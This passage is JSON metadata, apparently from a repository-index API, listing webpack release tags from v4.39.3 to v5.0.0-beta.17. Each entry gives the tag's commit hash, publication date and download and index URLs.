bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_